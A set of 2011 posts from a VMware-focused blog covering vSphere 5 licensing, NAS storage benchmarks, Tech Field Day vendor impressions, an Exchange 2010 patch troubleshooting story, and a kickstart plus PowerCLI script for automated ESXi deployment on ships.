VMs._ Simplification is always welcome!_ Of course, there are other improvements in VMFS-5 as well, but we’ll save those for a later post or two. --- # Dear John URL: https://vNinja.net/virtualization/dear-john/ Date: 2011-07-24 Author: christian Tags: John Troyer, V12n, VMware No, this is not a farewell post, but rather the opposite. It’s Dr. John Troyer’s birthday! John lives and breathes his role, as Senior Social Media Strategist at VMware, and I have to say that one of the most brilliant moves VMware has done is to employ John in his current role. Lots of other corporation employ marketing people in their social media roles, VMware went the other way and put the very technically savvy Dr. John in the driving seat. To be honest, I don’t think he even has a rear-view mirror, as he’s constantly evolving and moving forward. Well played VMware, and extremely well executed John. The vExpert program, that I’m lucky enough to be a part of for 2011, is his brainchild and if there ever should be a honorary vExpert to someone that goes above and beyond his job role it should be awarded to John himself. In fact, Johns presence in the social media space has helped immensely in creating the community that resolves around VMware products and virtualization as a whole. John has been, and continues to be, instrumental in keeping everyone in the loop and helping out wherever he possibly can. On a more personal level, I’ve been lucky enough to meet the mammoth wookie on more that one occasion, firstly at VMworld 2010 in Copenhagen and then again (a couple of times) during Tech Field Day #6 in Boston 2011. As the good sport John is, he even contributed in a special vSoup episode! John even contacted me way back in 2006, when the virtualization blogosphere was in it’s infancy, asking if I wanted to have my old site featured on V12n! Being an european ignorant, I’m possibly stepping on a lot of toes here, but as soon as I see Dr. John Troyer written somehere, I immediately think of Dr. J. Dr.J was a four time MVP and inducted into the NBA Hall of Fame in 1993. If there ever was a VMware Hall of Fame board somewhere in Palo Alto, Dr. John should have his employee number retired and his beard put on display. John, this one is for you. You’ve been an inspiration, mentor and all around great guy for years and years on end. A while ago, you asked on Twitter if ThinApp was VMware’s best kept secret. The real answer to that is a big fat NO. John, you’re the secret and for purely selfish reasons I hope the VMware management never finds out, and kicks you further up the VMware food chain. We small fish need large wookies to keep tabs on us, and help us feeling all cozy and warm. Happy birthday John! --- # SMB Shared Storage Smackdown - Part 1 NFS Performance URL: https://vNinja.net/virtualization/smb-shared-storage-smackdown-part-1-nfs-performance/ Date: 2011-07-17 Author: Tags: Recently at the office I was given the task to test out some SMB NAS products to use as potential candidates for some of our small branch offices all over the world. I did many tests relating from backup and replication to actually running VMs on them and pounding them with IOmeter. What I will share with you in this series of posts is my vSphere/IOmeter tests for NFS and iSCSI. With these tests my main goal was to see what kinds of IO loads the NAS devices could handle and also how suitable they would be for running a small vSphere environment. In my next post I will go into iSCSI performance and will publish all of my results including NFS into a downloadable PDF. NAS Devices # Synology DS411+ NetGear ReadyNAS NV+ QNAP TS4139 Pro II+ Iomega StorCenter ix4-200d I chose all 4 drive models of the arrays and they are all filled with 1 TB SATA disks. It was chosen this way since we would also be using these devices to hold rather large backups and replicate them elsewhere. To start out with I upgraded all of them to the latest firmware and created RAID 5 arrays on each of them. To make a long story short this gave me anywhere from 2.5 TB - 2.8 TB usable storage on each device. Since I tested both NFS and iSCSI I first created a 1 TB iSCSI Lun (1MB block size on Datastore) on each device then created an NFS export for the remainder of the space. Another small note is I was sure that write cacheing was enabled for all arrays that had an option to have to have turned on or off. Then I got down to setting up vSphere and the rest of my hardware. Server/VM/Network Infrastructure # 1 HP DL380 G5 - 2 quad core pCPUs - 16 logical cores with HT enabled 16GB of pRAM - ESXi 4.1 U1 installed default configuration Win2k8 VMs on each NAS Device 24GB boot device VMDK 100GB VMDK with standard LSI logic SAS connector 1 vCPU and 4096 vRAM DELL Powerconnect 5524 Switch - Split up into VLAN for VMs/vSphere Management and VLAN for iSCSI/NFS traffic I began the task of plugging everything in, getting everything set up properly as not to skew any results, and spinning up VMs in the Datastores from the attached iSCSI Luns/NFS Exports. It is important to note that for each Shared Storage Datastore I created a new VM in the exact specifications as above via Template and aligned all disks to 64k. For the connection to the storage I only had 1 extra 1gbe Nic per server. Then in ESXi I created a seperate standard vSwitch just for iSCSI/NFS traffic. If you are interested in the setup of my lab infrastructure please Contact me and I will be happy to go more indepth. Testing Method and Results Collection # After playing around with Iometer for some time and searching around to find a standard I decided to use the tests from the very popular VMware communities Open unofficial storage performance thread. The exact ICF file I used can also be found there for download if you would like to do some of your own tests. Regardless of the age of some of the posts I still think this is the most relevent and fair measure possible. These tests include Max Throughput-100% Read RealLife-60% random - 65% Read Max Throughput-50% Read Random-8k 70% Read First important thing to mention is only the VM generating the load was powered on during each test so there should be no skewing based on this. I put the IOmeter files into a set of Excel bar graphs. I decided to base my results on what I call the big 3; Total IOps, MBps, and Average latency. NFS Final Performance Result # $NFS Max Throughput 100% Read # RealLife-60% random - 65% Read # Max Throughput-50% Read # Random-8k 70% Read # Final Conclusions For NFS and closing # As you may have noticed by the assorted graphs the two winners to come out in the NFS performance tests were QNAP and Synology. QNAP appears to be slightly better at more Random workloads such as a real life vSphere environment and Synology seems to be way ahead of most of the arrays with solid sequential storage access - which would be perfect for a backup device. However, they all seem to have high Average Response Times during Random workloads which in my opinon makes or breaks how well an environment runs. From this first look I would say most of these NAS devices would be just fine for shared storage in a very small lab environment, a possible backup target, or for something simple as a fileserver volume. In my next post we can put it all together with the iSCSI results and declare the final winner of the SMB Shared Storage Smackdown!!! --- # vSphere 5 and new licensing - Good or bad? URL: https://vNinja.net/news/vsphere-5-and-new-licensing-good-or-bad/ Date: 2011-07-12 Author: Tags: ESXi, Licensing, VMware, vRam, vSphere, vSphere 5 As many of you did I watched todays Cloud Infrastructure Forum and the release of vSphere 5 today. I was very excited with many of the features such as Storage Profiling, Storage DRS, VMFS 5 release, and they have blown the top off of the resource limits on VMs to create Monster VMs - just to mention a few. However, one topic I notice causing quite a stir is the new licensing that seemed to be very briefly mentioned at the end of the webinar. To quote VMware in page 3 the vSphere 5 licensing guide: vSphere 5.0 will be licensed on a per-processor basis with a vRAM entitlement. Each vSphere 5.0 CPU license will entitle the purchaser to a specific amount of vRAM, or memory configured to virtual machines. The vRAM entitlement can be pooled across a vSphere environment to enable a true cloud or utility based IT consumption model. Just like VMware technology offers customers an evolutionary path from the traditional datacenter to cloud infrastructure, the vSphere 5.0 licensing model allows customers to evolve to a cloud-like “pay for consumption” model without disrupting established purchasing, deployment and license- management practices and processes. This caused quite an uproar on twitter of people complaining that it would raise their licensing costs. My personal opinion on the new licensing is both negative and positive.For every negative side I see in something I always try to put a positive spin on it. Firstly it is true that this may cause some highly consolidated shops to have to reasses their infrastructure before they upgrade to vSphere 5. It may require purchase of more licenses to obtain more pooled vRAM to be on the legal side of the licensing. It may also slow adoption as people have to perform audits on their infrastructure to determine what will be needed for the new licensing model. Also for some of the big memory packed beast servers this may prove to be a disadvantage. As I have heard thru the vSphere 5 licensing guide there is no hard limit and vSphere will not stop you from deploying VMs for every licensing model but Essentials which there is actually a hard limit. On a positive note; as a vSphere Admin this licensing may make my life easier. When application owners realize that there is a charge based on memory use and they may need to sign a purchase order to get their oversized machine approved instead of making their application more efficient they may change their tune a bit. This means less vm sprawl and more focus on what exactly is running in the environment and is it running at its absolute best and most efficient. Also If there is a zombie VM comsuming some valuable vRAM I am sure it will also be found and dispatched more quickly than with the current licensing model. --- # Online Event: Raising the Bar, Part V URL: https://vNinja.net/virtualization/online-event-raising-the-bar-part-v/ Date: 2011-07-07 Author: christian Tags: event, video, VMware July 12, 2011 9am-Noon Pacific Time: Join this online event, and get all the details on “the next generation of cloud infrastructure”! VMware CEO Paul Maritz and CTO Steve Herrod will be presenting on the next generation of cloud infrastructure. Join us and experience how the virtualization journey is helping transform IT and ushering in the era of Cloud Computing. 9:00-9:45 Paul and Steve present - live online streaming 10:00-12:00 three tracks of deep dive breakout sessions 10:00-12:00 live Q&A with VMware cloud and virtualization experts Register for the event now! Add event to your calendar! The live Q&A session looks very interesting, with fellow vExperts Eric Siebert (vSphere-land), David Davis (VMware Videos), Bob Plankers (The Lone Sysadmin) and Bill Hill (Virtual Bill) joining! Not to be missed! Update # If you register now, and attend the even on Tuesday, you might win a FREE pass to VMworld 2011 in Las Vegas or in Copenhagen! That’s a potential saving of $2195! For more details, see Who’s got the golden ticket? Win a free VMworld pass at our July 12 online event. --- # Setting Up Automated ESXi Deployments URL: https://vNinja.net/virtualization/setting-up-automated-esxi-deployments/ Date: 2011-07-07 Author: christian Tags: automation, ESXi, fun, Ops, PowerCLI, Powershell, realworld, Virtualization, VMware Automating ESXi installs was made much easier after the release of vSphere 4.1 where the Scripted Install feature was added, and by using VMware Auto Deploy from VMware Labs. VMware Auto Deploy requires that you have vCenter and Host Profiles in your environment, and that again requires that you have Enterprise Plus licenses in your environment. It is, however, possible to deploy ESXi in an automated fashion completely without vCenter and Host Profiles! By using a combination of a PXE based installation and PowerCLI for automating the setup of ESXi after the initial deployment. As this setup has been put together for a specific work project, my PowerCLI script also copies a VM template to the deployed ESXi host as well as the vMA for administrative tasks. There is one caveat with regards to this setup though, and that is that the free version of ESXi only allows PowerCLI in read-only mode. This means that you will either need to get licenses for the ESXi install, or use trial licenses. With the price drop from VMware on the Remote Office / Branch Office (ROBO) licenses, we’re looking at using that licensing model for our fleet of vessels. Overview # The “complete package” consists of the following components: Deployment VM This is a custom VM, built to provide DHCP and PXE services to do the actual ESXi installation Powershell + PowerCLI Scripts that configure the ESXi host, post installation, and copy your initial VMs to the new host Our current process looks like this: Connect physical host to deployment laptop via ethernet Start deployment VM on deployment laptop When deployment VM is finished booting, start physical host Physical host boots of network and PXE and installs ESXi When ESXi installation finishes, run PowerCLI script against host Disconnect deployment laptop and physical host, and connect physical host to vessel network Connect vSphere Client to ESXi install and start server VM Deployment VM # Since our deployment scenario might be a bit out of the ordinary, we have the deployment VM set up on VMware Workstation or VMware Player on a laptop. The reason for this is that we need a mobile deployment model as the locations we are deploying this on are not static. Not only are they mobile, they are actually floating around on rather large oceans. That’s right, we’re deploying ESXi hosts on our vessels world wide! Basic VM Setup # The basic setup is a standard Windows Server 2008 R2 with IIS installed. We will not be using any of the DHCP or other networking features included in Server 2008. In our environment it’s configured with a static ip of 172.16.200.1 DHCP + PXE Setup # For DHCP and PXE services, we are using Tftpd32 a free and open source application that provides us with all the required services for deployment eg. both DHCP and PXE. Kickstart Script # Our very basic kickstart script - ks.cfg - looks like this vmaccepteula rootpw password autopart --firstdisk --overwritevmfs install url http://172.16.200.1/ESXi network --bootproto=dhcp --device=vmnic0 reboot Basically this sets the root password, automatically deletes all partitions and sets up a new vmfs, tells the installer that it will find the installation files via http on the server and sets the networking configuration to DHCP. This will of course need tweaking in your environment, but this should at least get you started with building your own. More details on the ks.cfg bootstrap commands can be found in the ESX and vCenter Server Installation Guide PowerCLI Configuration Script # ######################################################## # # Created by Christian Mohn # for Seatrans AS # # No warranty suggested or implied # ########################################################` #connect to VirtualCenter or ESX host # function Register-VMX { param($entityName = $null,$dsNames = $null,$template = $false,$ignore = $null,$checkNFS = $false,$whatif=$false) function Get-Usage{ Write-Host "Parameters incorrect" -ForegroundColor red Write-Host "Register-VMX -entityName -dsNames [,...]" Write-Host "entityName : a cluster-, datacenter or ESX hostname (not together with -dsNames)" Write-Host "dsNames : one or more datastorename names (not together with -entityName)" Write-Host "ignore : names of folders that shouldn't be checked" Write-Host "template : register guests ($false)or templates ($true) - default : $false" Write-Host "checkNFS : include NFS datastores - default : $false" Write-Host "whatif : when $true will only list and not execute - default : $false" } if(($entityName -ne $null -and $dsNames -ne $null) -or ($entityName -eq $null -and $dsNames -eq $null)){ Get-Usage break } if($dsNames -eq $null){ switch((Get-Inventory -Name $entityName).GetType().Name.Replace("Wrapper","")){ "Cluster"{ $dsNames = Get-Cluster -Name $entityName | Get-VMHost | Get-Datastore | where {$_.Type -eq "VMFS" -or $checkNFS} | % {$_.Name} } "Datacenter"{ $dsNames = Get-Datacenter -Name $entityName | Get-Datastore | where {$_.Type -eq "VMFS" -or $checkNFS} | % {$_.Name} } "VMHost"{ $dsNames = Get-VMHost -Name $entityName | Get-Datastore | where {$_.Type -eq "VMFS" -or $checkNFS} | % {$_.Name} } Default{ Get-Usage exit } } } else{ $dsNames = Get-Datastore -Name $dsNames | where {$_.Type -eq "VMFS" -or $checkNFS} | Select -Unique | % {$_.Name} } $dsNames = $dsNames | Sort-Object $pattern = "*.vmx" if($template){ $pattern = "*.vmtx" } foreach($dsName in $dsNames){ Write-Host "Checking " -NoNewline; Write-Host -ForegroundColor red -BackgroundColor yellow $dsName $ds = Get-Datastore $dsName | Select -Unique | Get-View $dsBrowser = Get-View $ds.Browser $dc = Get-View $ds.Parent while($dc.MoRef.Type -ne "Datacenter"){ $dc = Get-View $dc.Parent } $tgtfolder = Get-View $dc.VmFolder $esx = Get-View $ds.Host[0].Key $pool = Get-View (Get-View $esx.Parent).ResourcePool $vms = @() foreach($vmImpl in $ds.Vm){ $vm = Get-View $vmImpl $vms += $vm.Config.Files.VmPathName } $datastorepath = "[" + $ds.Name + "]" $searchspec = New-Object VMware.Vim.HostDatastoreBrowserSearchSpec $searchspec.MatchPattern = $pattern $taskMoRef = $dsBrowser.SearchDatastoreSubFolders_Task($datastorePath, $searchSpec) $task = Get-View $taskMoRef while ("running","queued" -contains $task.Info.State){ $task.UpdateViewData("Info.State") } $task.UpdateViewData("Info.Result") foreach ($folder in $task.Info.Result){ if(!($ignore -and (&{$res = $false; $folder.FolderPath.Split("]")[1].Trim(" /").Split("/") | %{$res = $res -or ($ignore -contains $_)}; $res}))){ $found = $FALSE if($folder.file -ne $null){ foreach($vmx in $vms){ if(($folder.FolderPath + $folder.File[0].Path) -eq $vmx){ $found = $TRUE } } if (-not $found){ if($folder.FolderPath[-1] -ne "/"){$folder.FolderPath += "/"} $vmx = $folder.FolderPath + $folder.File[0].Path if($template){ $params = @($vmx,$null,$true,$null,$esx.MoRef) } else{ $params = @($vmx,$null,$false,$pool.MoRef,$null) } if(!$whatif){ $taskMoRef = $tgtfolder.GetType().GetMethod("RegisterVM_Task").Invoke($tgtfolder, $params) Write-Host "`t" $vmx "registered" } else{ Write-Host "`t" $vmx "registered" -NoNewline; Write-Host -ForegroundColor blue -BackgroundColor white " ==> What If" } } } } } Write-Host "Done" } } # Register-VMX -entityName "MyDatacenter" # Register-VMX -dsNames "datastore1","datastore2" # Register-VMX -dsNames "datastore1","datastore2" -template:$true # Register-VMX -entityName "MyDatacenter" -ignore "SomeFolder" # Register-VMX -dsNames "datastore3","datastore4" -ignore "SomeFolder" -checkNFS:$true # Register-VMX -entityName "MyDatacenter" -whatif:$true if ($args[0] -eq $null) # {$hostName = Read-Host "Enter ESX Host Name or IP"} # else # {$hostName = $args[0]} # # #connect to selected Virtualcenter or host server # Connect-VIServer $hostName # Set Datastore Name $dsName = "datastore1" $ds = Get-Datastore -Name $dsName New-PSDrive -Name $dsName -Root \ -PSProvider VimDatastore -Datastore $ds # Copy and Register VM from local drive to ESXi Host Copy-DatastoreItem C:\VMs\MyTestVM\* datastore1:\MyTestVM\ -Force Register-VMX -dsNames $dsName # Import vMA ovf Import-VApp -Source c:\VMs\vMA\vMA-4.1.0.0-268837.ovf -VMHost $hostName -Datastore $ds # Lets configure the host ######################################################## # Host Configuration # ######################################################## #Disable IPv6 Get-VMHostNetworkAdapter | where { $_.PortGroupName -eq "Service Console 1" } | Set-VMHostNetworkAdapter -IPv6Enabled $false # Configure networking # Not finished # Configure NTP Server Add-VMHostNtpServer -VMHost $hostName -NtpServer "0.vmware.pool.ntp.org" Add-VMHostNtpServer -VMHost $hostName -NtpServer "1.vmware.pool.ntp.org" Add-VMHostNtpServer -VMHost $hostName -NtpServer "2.vmware.pool.ntp.org" # Set VM Start Policy $vmstartpolicy = Get-VMStartPolicy -VM MyTestVM Set-VMStartPolicy -StartPolicy $vmstartpolicy -StartAction PowerOn This PowerCLI script is not 100% finished yet, the networking part remains to be automated to provide correct configuration based on which vessel we are deploying to, but in general it’s pretty much good to go. Of course, there are loads of ways to extend and improve this process, but for now this suits our needs very well. I’m sure I’ll need to revise it once vSphere.next is out and ready for deployment. Using a model like this, combined with some interesting usage patterns for vMA you can create an automated ESXi deployment scenario that let’s you deploy, patch and manage your remote vSphere infrastructure in a pretty streamlined fashion. --- # Exchange 2010 SP1 and KB2393802 or How to Have an Interesting Afternoon at the Office URL: https://vNinja.net/microsoft-2/exchange-2010-sp1-and-kb2393802-or-how-to-have-an-interesting-afternoon-at-the-office/ Date: 2011-07-06 Author: Tags: Event ID 2915, Exchange, KB2393802, Messaging, Microsoft, Ops, realworld, Windows Let me start this post out with a little story. I am normally a hardcore virtualization and storage guy. Sometimes my career in this sector brings me into working with stuff I haven’t worked with before because virtualization encompasses so much. As I continue to work with other teams I learn more and more about what they do everyday. I usually find myself involved in every performance troubleshooting session and every new project these days. My personal philosophy is the IT guy of the future will be truly converged just as all the technologies are converging into 1 box or “stack”. Specialties in smaller subsets will fall away and a more specialization in everything Datacenter may become the norm. Early Monday morning I overheard a conversation about connection issues with our new Exchange 2010 environment while drinking some coffee and reviewing my brand new vSphere design. I didn’t think about it very much until my boss came to my desk and asked me to have a look at the problem. Our messaging guy was on vacation and I was the only other person on staff who had some messaging experience. It seems that all of our global and even local offices were complaining about random exchange disconnections and also including email delivery delays from 30 minutes to 4 hours! It seems Activesync devices and OWA users were not affected by these delays at all. Being always up for learning new stuff I took the challenge. First let’s start with the quick facts I could put together. We had users in every country we have offices complaining about the random disconnections and delays. I had one actually confirmed in China but had some slight trouble getting exact user names from the local IT person. Also we had connections randomly disconnecting and showing disconnected in the lower right hand corner of the outlook client. I did not have any confirmation of who exactly was having these problems. To start I dug through the event logs on all the servers in the Exchange 2010 environment and the amount of errors I found was overwhelming. To shorten this up a bit and not write a novel most all of those I investigated were directly related to running Exchange 2010 SP1 without any update rollups in place. There were corresponding KB articles from Microsoft confirming these fixes in various update rollups. I noticed an Event ID 2915 on our CAS servers that stuck out. I noticed several EWS and RPC connections reporting “Session Limit Over Budget”. I correlated this with the Default Throttling Policy Exchange 2010 uses. It seems that the more mailboxes a user opens the more connections Exchange creates. It doesn’t somehow truncate these connections. To understand more about the Default Throttling Policy see Understanding Client Throttling Policies. So I quickly whipped up a powershell script that set the Throttling Policy defaults to Null so there was no restrictions (funny Microsoft states as a workaround just to do this if you encounter an issue). If you are interested in seeing this script or want me to go deeper about Throttling Policies contact me, but this article isn’t quite about this so I will move quickly on. After the Throttling Policy was changed the reported disconnections stopped but the delivery delays continued as mentioned all around the globe. With the other problem out of the way I began to realize that the problem seemed very random. Some users experienced it, some not, some couldn’t tell me whether they experienced it or not. This is when the hours of fruitlessly digging through configurations to learn them and reading about Exchange 2010 on Google began. I noticed our mailbox servers were set up in an active - active configuration with bidirectional replication using DAGs. This is when I decided to go back to basics of troubleshooting. I went over to my colleague sitting next to me and sent various test messages to him. All of them were promptly delivered without any problems. I noted down what server his mailbox was running on and moved on. Then I walked around the IT department until I was able to find a colleague that confirmed they had the delivery delays up to 4 hours. Just for kicks I turned off their cache mode on the Outlook client and their problem magically vanished. Then I turned cached mode back on and left it broken since I was determined to fix it on the server side and not just band aid the problem. When I went back to my desk and noticed what mailbox server the colleague with the delays was experiencing a light bulb went off and everything seemed to be coming together. Now all I had to do was note the differences between the 2 servers. First of all to stop the global issue from occurring while I could resolve the problem I failed all the DAG volumes over to the 1 server that did not seem to be having the problem. Reports quickly came in that the problem was resolved. Then I quickly moved on to examining differences between the 2 servers. After comparing windows updates between boxes I noticed that some updates from February were recently applied to both servers, however, there was 1 difference. It seems Microsoft KB2393802 was applied to one server but not the other. I googled regarding this but only found one vague thing about delays in Exchange 2010 mail delivery mentioned in the middle of a technet article relating to this patch, but nothing official at all from Microsoft. I removed the patch, rebooted, and tested with a test mailbox database running on the server I had created for this purpose. The problem was fixed as I thought. I tried to research on what about this patch could be causing this problem but came up with nothing. If any of you readers have an idea please comment and let me know your thoughts! I have attempted to contact Microsoft regarding this issue so they could possibly append to the KB article but they currently have not replied. --- # vExpert 2011 URL: https://vNinja.net/news/vexpert-2011/ Date: 2011-07-01 Author: christian Tags: fun --- # Zerto: Or What I Learned at Tech Field Day #6! URL: https://vNinja.net/virtualization/zerto-or-what-i-learned-at-tfd-6/ Date: 2011-06-27 Author: Tags: Disaster Recovery, DR, Tech Field Day, Virtualization, VMware, vSphere, Zerto The last day of Tech Field Day #6 myself and all the other delegates were lucky enough to get a sneak peek at stealth startup ‘Zerto’. We weren’t allowed to talk about it until the 22nd and I know I am a little slow on the punch but I currently haven’t seen a lot of coverage. Just for an initial disclosure statement my trip to Tech Field Day 6 was paid for by the vendors we visited, however, I am in no way obligated to write about them or publicize them in any manner. Zerto is an Israeli and US based company founded by Ziv and Odem Kedem. They are doing very interesting things in the BC/DR space for the enterprise and cloud sector regarding Virtualization. They promise host based storage agnostic replication and complete vCenter integration. Also a nice feature VM and VMDK consistency grouping, meaning it is built for vSphere environments and replicates on a VM/VMDK level. When I did a little pressing to see how it is done it was discovered that it doesn’t use vStorage APIs at all but it uses a vApp per host and a driver loaded directly into the hypervisor. That would mean it goes much deeper than Changed Block Tracking to determine incremental changes but it actually looks at the data coming thru the vSCSI stack. It works similar to a lot of current enterprise replication products where in that it splits the IO as reads and writes are coming thru, however, instead of putting it into Array Cache it puts it into memory since it is working directly in the Hypervisor. To credit @gabvirtualworld he mentioned that it uses the VMware IOVP API to complete this task in his post that goes a bit deeper. Zerto boasts application protection policies and built in support for VSS to attain better application consistency on the other side. This would be useful for example with Virtualized Exchange environments and running databases. The feature I really like is RDM replication to VMDK or the other way around. This would be really useful if you were moving datacenters and wanted to change some things around in your storage configuration during the initial replication stage. What I also like a lot is the ability to create checkpoints/bookmarks on your replicated VMs from different points in time just in case you had a replication of a corrupted VM or data inconsistency that you needed to go back in time to resolve (This is similar to the Recoverpoint technology). See the video below for a quick explanation of their product: Being kind of an old school FC Network guy and a big user of array specific replication products like SRDF and Recover point (the founders of the company actually created the Recover Point Technology and sold it to EMC) I am still very curious to see the speed and resilliency of the replication. For instance would the built in compression and WAN optimization be enough for a massive 100TB+ environment and how would it handle the initial synchronization? Would a product such as Riverbed Steelhead or any other WAN optimization products be able to increase the replication efficiency? It would be very interesting over time to see what third party partnerships and certifications they develop to better the usability and maturity of their product. --- # 7 Expert Tips for Managing Your Remote vSphere Infrastructure URL: https://vNinja.net/news/7-expert-tips-for-managing-your-remote-vsphere-infrastructure/ Date: 2011-06-20 Author: christian Tags: published, Veeam, Virtualization, VMware, vSphere, Whitepaper Now there is a catchy title if I ever saw one. Only “problem” is that it’s a whitepaper that I have written for Veeam. In reality this is the first published article I have ever written, that I didn’t publish on my own. I’m excited about it, yet strangely nervous about how it will be received by the people who download it. If you happen to do so, make sure to let me know how you found it, all comments and criticism will be most appreciated. Download this NEW whitepaper to get 7 Expert Tips for managing your remote vSphere infrastructure, including: Selecting the right products and solutions The best ways to protect data How to remotely manage and monitor the VMware infrastructure Go ahead and download it now, and let me have it… : 7 Expert Tips for Managing Your Remote vSphere Infrastructure --- # Multi-Hypervisor Management and the Future URL: https://vNinja.net/news/multi-hypervisor-management-and-the-future/ Date: 2011-06-12 Author: christian Tags: Hyper-V, hypervisor, management, Tech Field Day, vCenter, Xen In a previous post, vCenter Integration Mantra, I made the point that vSphere vAdmins wants the 3rd party modules to integrate into the vCenter client and show their delicious addon-value there, and not in their own management interface. Give the vAdmins the info they need, where they do most, if not all their work. Open up the admin client and let us get all that juicy and fruity information we need. Sounds good, right? Yes, it does. It sounds really good, but there is this one small curve-ball that can change everything. The 500 pound gorilla in the room that no-one wants to talk about, but we all know is there. As a day-to-day VMware vSphere admin it’s really easy to get our blinders on and not see the forest for all the trees. During Embotics presentation at Tech Field Day #6 in Boston, it dawned on me: We might just be approaching this entirely the wrong way around. This epiphany was caused by one single statement from Embotics: “Our plan is to be hypervisor agnostic, and support other architectures in future versions”. Multi-hypervisor support? Provisioning VMs regardless of hypervisor, just create what the business or application owner needs, on the performance and storage tier that suits that particular usage pattern best. Of course, this very much ties into the whole cloud mindset, and as a concept of management it is really interesting. Consider the following scenario: # Your enterprise has a high-performance VMware vSphere environment where mission-critical applications run. All the bells and whistles are available in this environment; HA/DRS, High Performance SAN, 10GigE networking and loads of CPU and RAM. For a given set of workloads available in the service catalog, the default would be to create new mission-critical workloads in this environment. Of course, chargeback mechanisms would also come into play, and price workloads in this environment at a premium level. For the sake of simplicity we’ll call this tier “Tier 1” “Tier 2” would be your test/development and QA environment where you probably won’t need the performance and high availability you get in “Tier 1”, and the chargeback mechanisms would reflect this in the cost model. This environment runs Hyper-V, has cheaper storage and simpler networking. “Tier 3” is your hosted environment, available outside of your own datacenters. Some workloads belong here too, and of course, chargeback would come into play here as well. To further complicate things, the provider uses Xen for their environment. If 3rd party applications where to tie into the administration tools for those three separate hypervisors, administrators would have to use three different tools to manage their environment. What if we turn everything on its head, and look at it from the exact opposite direction. Why should 3rd party vendors have to tie into the hypervisors management tools? They wouldn’t have to if the hypervisor vendors made their admin tools available in a manner that let 3rd party vendors integrate their management tool into theirs instead? Solarwinds does something really interesting in their Virtualization Manager product, the statistics and status reports you get in your Solarwinds Virtualization Manager dashboard are all available as web “widgets” that you can include in other web pages. In other words, you can integrate Solarwinds Virtualization Manager data into your existing dashboards. What if you could do the same with output from future VMware vSphere, Hyper-V and Citrix XenServer management products? VKernel could do the same for their data, and you could easily create your own dashboard that contained information from a wealth of sources. Of course, there are a number of issues with doing something like this, like “what happens if you want to move something from Tier 2 to Tier 1, and the VMs run on different hypervisors?”, “How do you enforce security between hypervisors with different management systems?” and so on. This is not something that can be very easily done today, and it might even be a pipe-dream, but it’s an intriguing thought. I do think we will see more and more multi-hypervisor environments in the years to come, and getting into the market for management of such environments seems like a good business opportunity (Note: IANAA = I Am Not An Analyst). Of course, this is an overly simplified scenario, but it does show that the need for management tools to be hypervisor agnostic is very much present, and will be even more so in the future. We as vAdmins need to apply pressure on our hypervisor vendors to try and make them open up their management tools in such a way that this could be possible someday, the multi-hypervisor world is already here and it’s growing. Note: I wrote this post while on the plane returning from Tech Field Day #6 in Boston. Greg Ferro has replied to my original post with a post of his own vCenter Integration Mantra – vEverything Is Not Wise where he pretty much says the same as I do in this post. Tom Howarth also commented on the original post. In fact, I even voiced this opinion in the session we had with Embotics, when the Tech Field Day delegates had a roundtable discussion after the presentations. It all goes to show that you can in fact get blinded by the light. --- # vCenter Integration Mantra URL: https://vNinja.net/news/vcenter-integration-mantra/ Date: 2011-06-10 Author: christian Tags: Ops, realworld, Tech Field Day, vCenter, VMware, vSphere During Tech Field Day #6 in Boston one particular general feature request has become increasingly prominent; Can we have it inside the vCenter client? In short, what we want is for all those great third party vendors like VKernel, Solarwinds and others to be able to put their feature addons directly into the vCenter client. Currently most third party apps “integrate” by offering a new tab where you can access it, but I would love to see that being expanded even further. As a concrete example, I would love to see for instance VKernel identify performance problems for a VM and then tell me, inside the summary tab for that VM that there is a problem. Show it to me where I do my work, which is in vCenter, and mostly on the summary screen. Dashboards are great, but we’re all suffering from dashboarditis, and the more disparate dashboards and tabs we get to have relations with, the less we’re actually able to use them properly. Also, raise a vCenter alert to leverage my existing alerting scheme to get my attention. If a 3rd party plugin sees that something is wrong, tell me through the existing infrastructure I already have in place. No need to reinvent the wheel each and every time, from each and every vendor. Couple that with my back-end user authentication (eg. Active Directory) for sign-on into your solution, and we’re getting much closer to the “single pane of glass” nirvana scenario we’re all craving. From what I gather the vCenter client (I am in no way, shape or form a developer), doesn’t allow this level of integration on the VM summary screen right now but VMware needs to make it possible in the future. We admins want this, and we need it, and frankly, I think we deserve it (and so does the 3rd party vendors contributing to this ecosystem). Update # Read Multi-Hypervisor Management and the Future for an updated and more forward thinking post on the same subject matter. --- # Tech Field Day #6 - Arriving in Boston URL: https://vNinja.net/news/tech-field-day-6-arriving-in-boston/ Date: 2011-06-08 Author: christian Tags: conference, fun, Tech Field Day, vNinja, vSamurai Yesterday I arrived at Logan International for Tech Field Day #6 in the greater Boston area. Christopher Wells had already arrived earlier in the day, and I was lucky enough to be picked up by Stephen Foskett at the airport and chauffeured to the Sheraton Framingham Hotel and Conference center. The travel itself was pretty uneventful, the only trouble I had was that when I landed at Schipol for transfer to the US flight, my boarding pass was nowhere to be found, and I don’t think I even received it when I checked in at Bergen Airport Flesland. At the self-service transit counters at Schipol I even got told, by the machines, that my reservation was non-existent. Of course, this was kind of troubling, but thanks to the very nice and service minded KLM employees at Schipol, that issue was quickly resolved and I was on my merry way. At least as merry as one can be when traveling transatlantic. The flight from Schipol to Logan was incredibly boring though.Normally I have no problems sleeping while flying, but this time around I got the grand total of zero minutes of sleep on the entire trip. Add in the 6 hour time difference, and you’ve got one tired traveling vNinja on your hands. Stephen and I met up with Chris Wells at the hotel, and went out searching for dinner. Stephen, who seems to know everything there is to know, and then some, about Boston and the surrounding areas, guided us to a local Indian restaurant where we got some great Thali. After that we ended up at the Horseshoe Pub & Restaurant for some vTFDbeers! How many beers do they have on tap? Who knows, all I know is that it’s a lot!. I haven’t seen that many beer taps since I was at The Gingerbreadman in New York many moons ago. As you can clearly see, the world has indeed survived the first ever meetup between the vSamurai and the vNinja. Meeting up with both Chris and Stephen was a real treat, and I can’t wait for the rest of the delegates arrive during the day, Tech Field Day 6: You look awesome. --- # vSoup and Tech Field Day #6 URL: https://vNinja.net/news/vsoup-and-tech-field-day-6/ Date: 2011-06-01 Author: christian Tags: conference, Tech Field Day, vSoup vSoup Episode #10 is finally released, this time with Stuart Radnidge (blog) as our guest. This episode is a bit unusual, as we didn’t really have a set agenda before starting the recording, so we jump around all of the place covering a pretty wide area of topics. Be sure to check it out! Tech Field Day #6 is approaching really fast, in fact it’s only a week away now! I will leave for Boston on Tuesday, June 7, for what looks to be a very, very busy but fun couple of days. I don’t know what to expect, but Chris Dearden has warned be that I probably won’t be idle much. This is the first Tech Field Day event that solely focuses on virtualization and the presenter list looks really promising: [table id=1 /] In addition to these, there is a couple of more presenters that have not been announced yet. I’ve met a few of the other delegates before, but the majority of them will be new 